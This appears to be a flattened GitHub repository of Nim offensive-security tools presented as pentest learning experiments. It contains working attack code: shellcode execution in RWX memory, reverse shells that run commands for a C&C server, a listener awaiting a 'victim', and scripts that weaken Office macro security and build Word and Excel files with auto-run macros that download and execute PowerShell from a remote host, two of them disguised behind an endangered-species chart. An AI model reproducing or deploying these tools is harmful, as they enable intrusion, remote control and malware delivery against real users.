├── .gitattributes ├── BuildCLRNim.bat ├── ConvertToNimArray.cs ├── LICENSE ├── README.md ├── compilation.txt ├── loadCLR.nim ├── peinjection.nim ├── powershellnim.nim ├── procinjection.nim ├── tcprevcontroller.nim ├── tcprevshellvariant1.nim ├── tcprevshellvariant2.nim ├── wordmac.nim ├── xlmacrovairant1.nim ├── xlmacrovairant2.nim └── xlmacrovairant3.nim /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /BuildCLRNim.bat: -------------------------------------------------------------------------------- 1 | nim c --hints:off --warnings:off --app=gui -d:release -d:strip --opt:size --passc=-flto --passl=-flto .\clrassembly.nim -------------------------------------------------------------------------------- /ConvertToNimArray.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Text; 4 | /// 5 | /// Programmer : Diljith Suresh 6 | /// 7 | namespace ConvertToNimArray 8 | { 9 | /* Console tool: reads one file from disk and prints its contents as a Nim byte-array literal of the form `var buf: array[N, byte] = [byte 0x??,0x??,...]` (the same declaration shape loadCLR.nim in this repository uses). */ class Program 10 | { 11 | /* Entry point. args[0] is the path of the file to convert; the literal is written to stdout and the process then blocks on stdin. No exception handling: an unreadable path surfaces as FileNotFoundException / IOException from File.ReadAllBytes. */ static void Main(string[] args) 12 | { 13 | /* Usage guard: no path argument -> print a hint and exit with the default exit code. */ if(args.Length < 1) 14 | { 15 | Console.WriteLine("Please specify file path argument."); 16 | return; 17 | } 18 | string binpath = args[0]; 19 | byte[] readassembly = File.ReadAllBytes(binpath); 20 | 21 | 22 | /* Initial capacity is only a hint: each byte appends 5 characters ("0x??,"), so the builder grows beyond Length * 2 for any non-trivial file. */ StringBuilder hexCodes = new StringBuilder(readassembly.Length * 2); 23 | foreach (byte b in readassembly) 24 | { 25 | /* Lower-case two-digit hex with a trailing comma; the last comma is trimmed below. */ hexCodes.AppendFormat("0x{0:x2},", b); 26 | } 27 | 28 | /* Header of the Nim declaration; the array length is the exact byte count of the input file. */ string nimarray = "var buf: array[" + readassembly.Length.ToString() + ", byte]" + " = [byte "; 29 | /* Substring(0, Length - 1) drops the trailing comma. For an empty input file Length - 1 is -1 and Substring throws ArgumentOutOfRangeException, so zero-length inputs are not handled. */ Console.WriteLine(nimarray + hexCodes.ToString().Substring(0, hexCodes.ToString().Length - 1) + "]"); 30 | /* Blocks until a line is read from stdin (presumably to keep a console window open when launched by double-click); when stdout is redirected this still waits for input. */ Console.ReadLine(); 31 | } 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /LICENSE: 
-------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 aalphaas 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Nim for Pentest 2 | 3 | ## Some of my nim learning experiments 4 | 5 | ### Projects 6 | 7 | ### 1 : PE Injection 8 | ### 2 : Load Dot Net binary to memory and execute 9 | ### 3 : Powershell reverse shell without invoking Powershell.exe 10 | ### 4 : TCP reverse shell 11 | ### 5 : Excel Macro automation 12 | ### 6 : Word Macro automation 13 | 14 | ### Effective Build option 15 | #### nim c --hints:off --warnings:off --app=gui -d:release -d:strip --opt:size --passc=-flto --passl=-flto .\sourcecode.nim 16 | 17 | #### A big thanks to https://github.com/byt3bl33d3r/OffensiveNim for WinAPI and other advanced base codes 18 | 19 | ### Author 20 | #### * **Diljith S** - *Initial work* - https://github.com/diljithishere -------------------------------------------------------------------------------- /compilation.txt: -------------------------------------------------------------------------------- 1 | https://nim-lang.org/docs/nimc.html 2 | 3 | nim c -d:release myproject.nim 4 | 5 | nim c --cc:llvm_gcc --compile_only myfile.nim 6 | 7 | 8 | nim c --cpu:i386 --os:linux --compileOnly --genScript myproject.nim 9 | 10 | nim c --cpu:arm --os:linux myproject.nim 11 | 12 | arm.linux.gcc.path = "/usr/bin" 13 | arm.linux.gcc.exe = "arm-linux-gcc" 14 | arm.linux.gcc.linkerexe = "arm-linux-gcc" 15 | 16 | Windows build from linux 17 | nim c -d:mingw myproject.nim 18 | 19 | nim c -c test.nim 20 | 21 | nim c -r --threads:on src/client.nim 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /loadCLR.nim: -------------------------------------------------------------------------------- 1 | import winim/clr 2 | 3 | var buf: array[9728, byte] = [byte 
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00] 4 | var assembly = load(buf) 5 | 6 | var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments 7 | assembly.EntryPoint.Invoke(nil, toCLRVariant([arr])) 8 | 9 | #arr = toCLRVariant(["From Nim & .NET!"], VT_BSTR) # Actually passing some args 10 | #assembly.EntryPoint.Invoke(nil, toCLRVariant([arr])) 11 | 12 | -------------------------------------------------------------------------------- /peinjection.nim: -------------------------------------------------------------------------------- 1 | import winim/lean 2 | 3 | when defined(windows): #Checks whether this Nim code is being compiled on Windows 4 | var shellcode: array[791, byte] = [ 5 | byte 0x07,0x4e,0xaf,0x7d,0x48,0xd6,0x6e,0x46,0x8e, 6 | 0x9f,0xe7,0xf4,0xdb,0x16,0x50,0xcf,0x34,0xad,0x71,0x7d,0x70,0x9f,0xa9,0x86, 7 | 0x8e,0x40,0x32,0xbc,0x11,0x5b,0x89,0x03,0x4e,0xcb,0x55,0x92,0x19,0x98,0xe1, 8 | 0x87,0x4d,0x3a,0x27,0x81,0x40,0xc7,0x6a,0xde,0xe4,0xbf,0xbe,0xbd,0x55,0x5d, 9 | 0x59,0x33,0x2c,0xe9,0x18,0x21,0x92,0x9f,0xa9,0x86,0x8e] 10 | 11 | let shellCodePtr = VirtualAlloc(nil,cast[SIZE_T](shellcode.len), MEM_COMMIT,PAGE_EXECUTE_READ_WRITE) 12 | 13 | copyMem(shellCodePtr,unsafeAddr shellcode,cast[SIZE_T](shellcode.len)) # Copy Shellcode to the allocated memory section 14 | let tHandle = CreateThread(cast[LP_SECURITY_ATTRIBUTES](0), cast[SIZE_T](shellcode.len),cast[LPTHREAD_START_ROUTINE](shellCodePtr),cast[LPVOID](0),cast[DWORD](0),cast[LPDWORD](0)) # Run shell code 15 | WaitForSingleObject(cast[HANDLE](tHandle), cast[DWORD](0xFFFFFFFF)) -------------------------------------------------------------------------------- /powershellnim.nim: -------------------------------------------------------------------------------- 1 
| import winim/clr 2 | import base64 3 | 4 | 5 | var Automation = load("System.Management.Automation") 6 | var RunspaceFactory = Automation.GetType("System.Management.Automation.Runspaces.RunspaceFactory") 7 | 8 | var runspace = @RunspaceFactory.CreateRunspace() 9 | 10 | runspace.Open() 11 | 12 | var pipeline = runspace.CreatePipeline() 13 | let strdecode = decode("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") 14 | #echo strdecode 15 | pipeline.Commands.AddScript(strdecode) 16 | 17 | pipeline.Invoke() 18 | 19 | runspace.Close() 20 | 21 | -------------------------------------------------------------------------------- /procinjection.nim: -------------------------------------------------------------------------------- 1 | import winim/lean 2 | 3 | when defined(windows): #Checks whether this Nim code is being compiled on Windows 4 | echo GetProcessId("explore.exe") 5 | # ToDO 6 | 7 | -------------------------------------------------------------------------------- /tcprevcontroller.nim: -------------------------------------------------------------------------------- 1 | import net 2 | #To Do 3 | var server: Socket = newSocket() 4 | #server.setSockOpt(OptReuseAddr, true) 5 | server.bindAddr(Port(443)) 6 | server.listen() 7 | stdout.writeLine("Waiting for a victim ....") 8 | 9 | var client: Socket 10 | var address = "" 11 | var cmresult: string 12 | while true: 13 | server.acceptAddr(client,address) 14 | echo("Client connected from: ", address) 15 | 16 | var command = readLine(stdin) 17 | echo(command) 18 | 19 | client.send(command) 20 | echo("received res") 21 | cmresult = client.recvLine() 22 | stdout.writeLine(cmresult) 23 | 24 | if cmresult == "bye": 25 | break 26 | 27 | server.close() -------------------------------------------------------------------------------- /tcprevshellvariant1.nim: -------------------------------------------------------------------------------- 1 | import net 2 | import osproc # for execCmdEx 3 | import os 4 | 5 | # Your C&C server 
IP and Port 6 | var ip = "192.168.1.68" 7 | var port = 443 8 | 9 | 10 | # Create a new socket 11 | var socket = newSocket() 12 | var finalcommand : string 13 | while true: 14 | try: 15 | socket.connect(ip, Port(port)) # Connect to our C&C server 16 | 17 | # On a successful connection receive command from C&C server , execute the command and send back result 18 | while true: 19 | try: 20 | socket.send(" ") 21 | var command = socket.recvLine() # Reads the command from our server to get executed on the victim machine 22 | if command == "bye": 23 | socket.send("Exiting Nim Shell") 24 | socket.close() 25 | system.quit(0) 26 | if system.hostOS == "windows": 27 | finalcommand = "cmd /C" & command 28 | else: 29 | finalcommand = "/bin/sh -c" & command 30 | var (cmdres, _) = execCmdEx(finalcommand) # Executes the command and saves the result in cmdres 31 | socket.send(cmdres) # Sends back the result to the C&C server 32 | except: 33 | socket.close() 34 | system.quit(0) 35 | 36 | # if connection fails , try after 5 seconds 37 | except: 38 | echo "Connection failed, Retry after 5 seconds..." 
39 | sleep(5000) # Wait for 5 seconds 40 | continue -------------------------------------------------------------------------------- /tcprevshellvariant2.nim: -------------------------------------------------------------------------------- 1 | import net 2 | import osproc # for execCmdEx 3 | import os 4 | 5 | # Your C&C server IP and Port 6 | var ip = "192.168.1.68" 7 | var port = 443 8 | 9 | 10 | # Create a new socket 11 | var socket = newSocket() 12 | var finalcommand : string 13 | 14 | try: 15 | socket.connect(ip, Port(port)) # Connect to our C&C server 16 | 17 | # On a successful connection receive command from C&C server , execute the command and send back result 18 | while true: 19 | var command = socket.recvLine() # Reads the command from our server to get executed on the victim machine 20 | echo(command) 21 | if command == "bye": 22 | socket.send("Exiting Nim Shell") 23 | socket.close() 24 | system.quit(0) 25 | if system.hostOS == "windows": 26 | finalcommand = "cmd /C" & command 27 | else: 28 | finalcommand = "/bin/sh -c" & command 29 | var (cmdres, _) = execCmdEx(finalcommand) # Executes the command and saves the result in cmdres 30 | socket.send(cmdres) # Sends back the result to the C&C server 31 | 32 | socket.close() 33 | system.quit(0) 34 | 35 | # if connection fails , try after 5 seconds 36 | except: 37 | echo "Connection failed." 
38 | -------------------------------------------------------------------------------- /wordmac.nim: -------------------------------------------------------------------------------- 1 | import winim/com 2 | import strformat 3 | import os 4 | 5 | let wordfilename = paramStr(1) 6 | comScript: 7 | var objMsWord = CreateObject("Word.Application") 8 | var WshShell = CreateObject("WScript.Shell") 9 | var Application_Version = objMsWord.Version 10 | 11 | 12 | var strVBOMRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Word\Security\AccessVBOM" 13 | var strVBAWarnRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Word\Security\VBAWarnings" 14 | WshShell.RegWrite(strVBOMRegPath, 1, "REG_DWORD") 15 | WshShell.RegWrite(strVBAWarnRegPath, 1, "REG_DWORD") 16 | 17 | objMsWord.visible = true 18 | objMsWord.displayalerts = false 19 | 20 | #var objWordDoc = objMsWord.documents.Add() 21 | #var fn = r"D:\Dev369\NimForPentest\test.doc" 22 | #var objWordDoc = objMsWord.documents.Open(fn,ConfirmConversions:=FALSE,ReadOnly:=1,AddToRecentFiles:=0,PasswordDocument:="",PasswordTemplate:=0,Revert:=0,WritePasswordDocument:="",WritePasswordTemplate:="",Format:=0,Encoding:=20127,Visible:=0,OpenAndRepair:=0,DocumentDirection:=0,NoEncodingDialog:=0,XMLTransform:=0) 23 | var objWordDoc = objMsWord.documents.Add() 24 | objWordDoc.Activate() 25 | var wordVBmodule = objWordDoc.VBProject.VBComponents.Add(1) 26 | var strMacroRevShell = """Sub Auto_Open() 27 | Call Shell("cmd.exe /c powershell.exe IEX(IWR -uri 'http://192.168.1.75:443/getit.txt')", 0) 28 | End Sub""" 29 | wordVBmodule.CodeModule.AddFromString(strMacroRevShell) 30 | 31 | echo wordfilename 32 | #objWordDoc.SaveAs(wordfilename,0) 33 | 
objWordDoc.SaveAs(wordfilename,FileFormat:=0,Password:="",WritePassword:="",ReadOnlyRecommended:=FALSE,AddToRecentFiles:=0,EmbedTrueTypeFonts:=0,SaveNativePictureFormat:=0,SaveFormsData:=0,SaveAsAOCELetter:=0,Encoding:=20127,InsertLineBreaks:=0,AllowSubstitutions:=TRUE,LineEnding:=0,AddBiDiMarks:=0) 34 | #objWordDoc.SaveAs(wordfilename,FileFormat:=0,LockComments:=0,Password:="",AddToRecentFiles:=0,WritePassword:="",ReadOnlyRecommended:=0,EmbedTrueTypeFonts:=0,SaveNativePictureFormat:=0,SaveFormsData:=0,SaveAsAOCELetter:=0,Encoding:=0,InsertLineBreaks:=0,AllowSubstitutions:=0,LineEnding:=0,AddBiDiMarks:=0) 35 | WshShell.RegWrite(strVBOMRegPath, 0, "REG_DWORD") 36 | WshShell.RegWrite(strVBAWarnRegPath, 0, "REG_DWORD") 37 | objWordDoc.Close(false) 38 | #COM_FullRelease() # make sure word.exe will end it self -------------------------------------------------------------------------------- /xlmacrovairant1.nim: -------------------------------------------------------------------------------- 1 | import winim/com 2 | import strformat 3 | 4 | var objExcel = CreateObject("Excel.Application") 5 | objExcel.Visible= false 6 | var WshShell = CreateObject("WScript.Shell") 7 | var Application_Version = objExcel.Version 8 | 9 | var strRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Excel\Security\AccessVBOM" 10 | WshShell.RegWrite(strRegPath, 1, "REG_DWORD") 11 | var objWorkbook = objExcel.Workbooks.Add() 12 | var xlmodule = objWorkbook.VBProject.VBComponents.Add(1) 13 | var strMacroRevShell = """Sub Auto_Open() 14 | Call Shell(""cmd.exe /c powershell.exe IEX(IWR -uri 'http://192.168.1.75:443/getit.txt')"", 1) 15 | End Sub""" 16 | xlmodule.CodeModule.AddFromString(strMacroRevShell) 17 | objWorkbook.SaveAs("test.xls") 18 | objExcel.DisplayAlerts = false 19 | objWorkbook.Close(false) 20 | 21 | 22 | -------------------------------------------------------------------------------- /xlmacrovairant2.nim: 
-------------------------------------------------------------------------------- 1 | import winim/com 2 | import strformat 3 | 4 | comScript: 5 | var objExcel = CreateObject("Excel.Application") 6 | var WshShell = CreateObject("WScript.Shell") 7 | var Application_Version = objExcel.Version 8 | 9 | 10 | var strVBOMRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Excel\Security\AccessVBOM" 11 | var strVBAWarnRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Excel\Security\VBAWarnings" 12 | WshShell.RegWrite(strVBOMRegPath, 1, "REG_DWORD") 13 | WshShell.RegWrite(strVBAWarnRegPath, 1, "REG_DWORD") 14 | 15 | objExcel.visible = true 16 | objExcel.sheetsInNewWorkBook = 1 17 | objExcel.displayalerts = false 18 | 19 | var objWorkbook = objExcel.workbooks.add() 20 | var xlmodule = objWorkbook.VBProject.VBComponents.Add(1) 21 | var strMacroRevShell = """Sub Workbook_Open() 22 | Call Shell("cmd.exe /c powershell.exe IEX(IWR -uri 'http://192.168.1.75:443/getit.txt')", 1) 23 | End Sub""" 24 | xlmodule.CodeModule.AddFromString(strMacroRevShell) 25 | objExcel.activeSheet.name = "Critically Endangered" 26 | 27 | 28 | 29 | for i, j in ["Mammals", "Birds", "Reptiles", "Fishes", "Plants"]: 30 | objExcel.activeSheet.cells(1, i + 1) = j # this line needs comScript macro 31 | 32 | for cell in objExcel.activeSheet.range("A1:E1"): 33 | cell.interior.color = RGB(0xee, 0xdd, 0x82) 34 | cell.interior.pattern = 1 35 | cell.font.size = 13 36 | cell.borders.color = RGB(0, 0, 0) 37 | cell.borders.lineStyle = 1 38 | cell.borders.weight = 2 39 | 40 | var sheet = objExcel.activeSheet 41 | sheet.range("A2").value = 184 42 | sheet.range("B2").value = 182 43 | sheet.range("C2").value = 57 44 | sheet.range("D2").value = 162 45 | sheet.range("E2").value = 1276 46 | 47 | sheet.range("A4:E4").merge() 48 | sheet.range("A4").value = "Source: IUCN Red List 2003" 49 | sheet.range("A1:E2").borderAround(1, 2, nil.variant, RGB(0, 0, 0)) 50 | 51 | 
sheet.columns("A:E").columnWidth = 12.5 52 | 53 | var xrange = objExcel.activeSheet.range("A1:E2") 54 | var xchart = objWorkbook.charts.add() 55 | xchart.chartWizard(xrange, -4100, 7, 1, 1, 0, false, "Critically Endangered Plants and Animals") 56 | xchart.HasAxis(3) = false 57 | var fn = r"D:\Dev369\NimForPentest\test.xls" 58 | objWorkbook.SaveAs(fn,FileFormat:=56,Password:=0,WriteResPassword:=0,ReadOnlyRecommended:=0,CreateBackup:=0,AccessMode:=1,ConflictResolution:=3,AddToMru:=0,TextCodepage:=0,TextVisualLayout:=0,Local:=0) 59 | WshShell.RegWrite(strVBOMRegPath, 0, "REG_DWORD") 60 | WshShell.RegWrite(strVBAWarnRegPath, 0, "REG_DWORD") 61 | COM_FullRelease() # make sure excel.exe will end it self -------------------------------------------------------------------------------- /xlmacrovairant3.nim: -------------------------------------------------------------------------------- 1 | import winim/com 2 | import strformat 3 | import os 4 | 5 | let xlfilename = paramStr(1) 6 | comScript: 7 | var objExcel = CreateObject("Excel.Application") 8 | var WshShell = CreateObject("WScript.Shell") 9 | var Application_Version = objExcel.Version 10 | 11 | 12 | var strVBOMRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Excel\Security\AccessVBOM" 13 | var strVBAWarnRegPath = fmt"HKEY_CURRENT_USER\Software\Microsoft\Office\{Application_Version}\Excel\Security\VBAWarnings" 14 | WshShell.RegWrite(strVBOMRegPath, 1, "REG_DWORD") 15 | WshShell.RegWrite(strVBAWarnRegPath, 1, "REG_DWORD") 16 | 17 | objExcel.visible = false 18 | objExcel.sheetsInNewWorkBook = 1 19 | objExcel.displayalerts = false 20 | 21 | var objWorkbook = objExcel.workbooks.add() 22 | var xlmodule = objWorkbook.VBProject.VBComponents.Add(1) 23 | var strMacroRevShell = """Sub Auto_Open() 24 | Call Shell("cmd.exe /c powershell.exe IEX(IWR -uri 'http://192.168.1.75:443/getit.txt')", 1) 25 | End Sub""" 26 | xlmodule.CodeModule.AddFromString(strMacroRevShell) 27 | objExcel.activeSheet.name = 
"Critically Endangered" 28 | 29 | for i, j in ["Mammals", "Birds", "Reptiles", "Fishes", "Plants"]: 30 | objExcel.activeSheet.cells(1, i + 1) = j # this line needs comScript macro 31 | 32 | for cell in objExcel.activeSheet.range("A1:E1"): 33 | cell.interior.color = RGB(0xee, 0xdd, 0x82) 34 | cell.interior.pattern = 1 35 | cell.font.size = 13 36 | cell.borders.color = RGB(0, 0, 0) 37 | cell.borders.lineStyle = 1 38 | cell.borders.weight = 2 39 | 40 | var sheet = objExcel.activeSheet 41 | sheet.range("A2").value = 184 42 | sheet.range("B2").value = 182 43 | sheet.range("C2").value = 57 44 | sheet.range("D2").value = 162 45 | sheet.range("E2").value = 1276 46 | 47 | sheet.range("A4:E4").merge() 48 | sheet.range("A4").value = "Source: IUCN Red List 2003" 49 | sheet.range("A1:E2").borderAround(1, 2, nil.variant, RGB(0, 0, 0)) 50 | 51 | sheet.columns("A:E").columnWidth = 12.5 52 | 53 | var xrange = objExcel.activeSheet.range("A1:E2") 54 | var xchart = objWorkbook.charts.add() 55 | xchart.chartWizard(xrange, -4100, 7, 1, 1, 0, false, "Critically Endangered Plants and Animals") 56 | xchart.HasAxis(3) = false 57 | #var fn = r"D:\Dev369\NimForPentest\test.xls" 58 | objWorkbook.SaveAs(xlfilename,FileFormat:=56,Password:="",WriteResPassword:="",ReadOnlyRecommended:=FALSE,CreateBackup:=0,AccessMode:=1,ConflictResolution:=3,AddToMru:=0,TextCodepage:=0,TextVisualLayout:=0,Local:=0) 59 | WshShell.RegWrite(strVBOMRegPath, 0, "REG_DWORD") 60 | WshShell.RegWrite(strVBAWarnRegPath, 0, "REG_DWORD") 61 | objExcel.DisplayAlerts = false 62 | objWorkbook.Close(false) 63 | COM_FullRelease() # make sure excel.exe will end it self --------------------------------------------------------------------------------